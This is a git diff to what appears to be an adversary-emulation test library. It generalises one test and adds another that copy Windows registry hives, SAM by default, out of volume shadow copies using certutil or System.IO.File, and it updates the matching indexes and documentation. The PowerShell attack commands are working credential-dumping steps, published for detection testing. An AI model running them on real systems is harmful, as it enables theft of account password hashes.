diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 55fa2871..e9380dbe 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -76,7 +76,8 @@ credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, cr
credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
credential-access,T1003.002,Security Account Manager,4,PowerDump Registry dump of SAM for hashes and usernames,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
-credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hive with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell
+credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hives with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell
+credential-access,T1003.002,Security Account Manager,6,dump volume shadow copy hives with System.IO.File,9d77fed7-05f8-476e-a81b-8ff0472c64d0,powershell
collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 3f7d3f9e..3a96f7e7 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -52,7 +52,8 @@ credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, cr
credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
credential-access,T1003.002,Security Account Manager,4,PowerDump Registry dump of SAM for hashes and usernames,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
-credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hive with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell
+credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hives with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell
+credential-access,T1003.002,Security Account Manager,6,dump volume shadow copy hives with System.IO.File,9d77fed7-05f8-476e-a81b-8ff0472c64d0,powershell
collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
collection,T1560.001,Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
collection,T1560.001,Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 8aa3bf01..12dbc257 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -122,7 +122,8 @@
- Atomic Test #2: Registry parse with pypykatz [windows]
- Atomic Test #3: esentutl.exe SAM copy [windows]
- Atomic Test #4: PowerDump Registry dump of SAM for hashes and usernames [windows]
- - Atomic Test #5: dump volume shadow copy hive with certutil [windows]
+ - Atomic Test #5: dump volume shadow copy hives with certutil [windows]
+ - Atomic Test #6: dump volume shadow copy hives with System.IO.File [windows]
- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index a5799b2d..a3558cd7 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -90,7 +90,8 @@
- Atomic Test #2: Registry parse with pypykatz [windows]
- Atomic Test #3: esentutl.exe SAM copy [windows]
- Atomic Test #4: PowerDump Registry dump of SAM for hashes and usernames [windows]
- - Atomic Test #5: dump volume shadow copy hive with certutil [windows]
+ - Atomic Test #5: dump volume shadow copy hives with certutil [windows]
+ - Atomic Test #6: dump volume shadow copy hives with System.IO.File [windows]
- T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 74487a9b..4cfe28ae 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -5440,19 +5440,23 @@ credential-access:
Invoke-PowerDump
name: powershell
elevation_required: true
- - name: dump volume shadow copy hive with certutil
+ - name: dump volume shadow copy hives with certutil
auto_generated_guid: eeb9751a-d598-42d3-b11c-c122d9c3f6c7
description: |
- Dump the SAM hive from volume shadow copies with the certutil utility
+ Dump hives from volume shadow copies with the certutil utility
This can be done with a non-admin user account
supported_platforms:
- windows
input_arguments:
- file_path:
+ dump_path:
description: Path where the hive will be dumped
type: Path
default: "$ENV:temp"
- file_name:
+ target_hive:
+ description: Hive you wish to dump
+ type: String
+ default: SAM
+ dumped_hive:
description: Name of the dumped hive
type: String
default: myhive
@@ -5462,13 +5466,48 @@ credential-access:
$shadowlist = get-wmiobject win32_shadowcopy
$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
- $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\SYSTEM"
- certutil -f -v -encodehex $shadowpath #{file_path}\#{file_name} 2
+ $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
+ certutil -f -v -encodehex $shadowpath #{dump_path}\#{dumped_hive} 2
name: powershell
elevation_required: false
cleanup_command: |
write-host ""
- $toremove = #{file_path} + "\" + '#{file_name}'
+ $toremove = #{dump_path} + "\" + '#{dumped_hive}'
+ rm $toremove
+ - name: dump volume shadow copy hives with System.IO.File
+ auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0
+ description: 'Dump hives from volume shadow copies with System.IO.File
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ dump_path:
+ description: Path where the hive will be dumped
+ type: Path
+ default: "$ENV:temp"
+ target_hive:
+ description: Hive you wish to dump
+ type: String
+ default: SAM
+ dumped_hive:
+ description: Name of the dumped hive
+ type: String
+ default: myhive
+ executor:
+ command: |
+ write-host ""
+ $shadowlist = get-wmiobject win32_shadowcopy
+ $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
+ $maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
+ $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
+ $mydump = #{dump_path} + '\' + '#{dumped_hive}'
+ [System.IO.File]::Copy($shadowpath , $mydump)
+ name: powershell
+ elevation_required: false
+ cleanup_command: |-
+ write-host ""
+ $toremove = #{dump_path} + "\" + '#{dumped_hive}'
rm $toremove
T1555.002:
technique:
diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md
index 80948108..27f223f3 100644
--- a/atomics/T1003.002/T1003.002.md
+++ b/atomics/T1003.002/T1003.002.md
@@ -32,7 +32,9 @@ Notes:
- [Atomic Test #4 - PowerDump Registry dump of SAM for hashes and usernames](#atomic-test-4---powerdump-registry-dump-of-sam-for-hashes-and-usernames)
-- [Atomic Test #5 - dump volume shadow copy hive with certutil](#atomic-test-5---dump-volume-shadow-copy-hive-with-certutil)
+- [Atomic Test #5 - dump volume shadow copy hives with certutil](#atomic-test-5---dump-volume-shadow-copy-hives-with-certutil)
+
+- [Atomic Test #6 - dump volume shadow copy hives with System.IO.File](#atomic-test-6---dump-volume-shadow-copy-hives-with-systemiofile)
@@ -209,8 +211,8 @@ Invoke-PowerDump
-## Atomic Test #5 - dump volume shadow copy hive with certutil
-Dump the SAM hive from volume shadow copies with the certutil utility
+## Atomic Test #5 - dump volume shadow copy hives with certutil
+Dump hives from volume shadow copies with the certutil utility
This can be done with a non-admin user account
**Supported Platforms:** Windows
@@ -225,8 +227,9 @@ This can be done with a non-admin user account
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| file_path | Path where the hive will be dumped | Path | $ENV:temp|
-| file_name | Name of the dumped hive | String | myhive|
+| dump_path | Path where the hive will be dumped | Path | $ENV:temp|
+| target_hive | Hive you wish to dump | String | SAM|
+| dumped_hive | Name of the dumped hive | String | myhive|
#### Attack Commands: Run with `powershell`!
@@ -237,14 +240,61 @@ write-host ""
$shadowlist = get-wmiobject win32_shadowcopy
$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
-$shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\SYSTEM"
-certutil -f -v -encodehex $shadowpath #{file_path}\#{file_name} 2
+$shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
+certutil -f -v -encodehex $shadowpath #{dump_path}\#{dumped_hive} 2
```
#### Cleanup Commands:
```powershell
write-host ""
-$toremove = #{file_path} + "\" + '#{file_name}'
+$toremove = #{dump_path} + "\" + '#{dumped_hive}'
+rm $toremove
+```
+
+
+
+
+
+
+
+
+## Atomic Test #6 - dump volume shadow copy hives with System.IO.File
+Dump hives from volume shadow copies with System.IO.File
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 9d77fed7-05f8-476e-a81b-8ff0472c64d0
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| dump_path | Path where the hive will be dumped | Path | $ENV:temp|
+| target_hive | Hive you wish to dump | String | SAM|
+| dumped_hive | Name of the dumped hive | String | myhive|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+write-host ""
+$shadowlist = get-wmiobject win32_shadowcopy
+$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
+$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
+$shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
+$mydump = #{dump_path} + '\' + '#{dumped_hive}'
+[System.IO.File]::Copy($shadowpath , $mydump)
+```
+
+#### Cleanup Commands:
+```powershell
+write-host ""
+$toremove = #{dump_path} + "\" + '#{dumped_hive}'
rm $toremove
```